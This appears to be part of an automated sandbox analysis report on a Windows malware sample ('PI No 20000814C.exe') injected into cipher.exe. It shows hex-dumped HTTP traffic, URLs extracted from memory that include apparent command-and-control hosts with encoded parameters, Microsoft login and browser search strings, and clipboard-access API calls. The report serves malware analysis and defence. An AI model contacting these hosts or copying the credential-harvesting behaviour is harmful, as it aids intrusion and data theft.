64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:22:49 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:22:51 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:22:54 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: cipher.exe, 00000004.00000002.4527269915.0000000005ED6000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003376000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://fedoraproject.org/
Source: cipher.exe, 00000004.00000002.4527269915.0000000006E8A000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.000000000432A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N
Source: cipher.exe, 00000004.00000002.4527269915.0000000005ED6000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003376000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://nginx.net/
Source: cipher.exe, 00000004.00000002.4527269915.0000000006B66000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000004006000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMY
Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4527764176.00000000052C7000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.isrninjas.com
Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4527764176.00000000052C7000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.isrninjas.com/klk7/
Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cipher.exe, 00000004.00000002.4527269915.000000000651E000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.00000000039BE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://help.hover.com/home?source=expired
Source: cipher.exe, 00000004.00000002.4520210070.0000000003629000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cipher.exe, 00000004.00000003.2413338446.00000000082BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cipher.exe, 00000004.00000002.4520210070.0000000003629000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Q
Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: cipher.exe, 00000004.00000002.4527269915.00000000069D4000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003E74000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://t2837.am-track.pl/redir.php?panel=Market_Listing&params=id%3D3940392%26utm_source%3Dmarket_r
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://twitter.com/hover
Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: cipher.exe, 00000004.00000002.4527269915.000000000638C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.000000000382C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.featurasandals.com/tqo3/?FNPd=2bWSXONhxyHzF1cu5s6B/sJ8pfZzXPi
Source: cipher.exe, 00000004.00000002.4527269915.0000000007340000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.00000000047E0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy
Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/?source=expired
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/about?source=expired
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/domain_pricing?source=expired
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/domains/results
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/email?source=expired
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/privacy?source=expired
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/renew/domain/botcsllc.com?source=expired
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/renew?source=expired
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/tools?source=expired
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/tos?source=expired
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/transfer_in?source=expired
Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/hover_domains
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F7425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard, 0_2_00F7425A
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F74458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00F74458
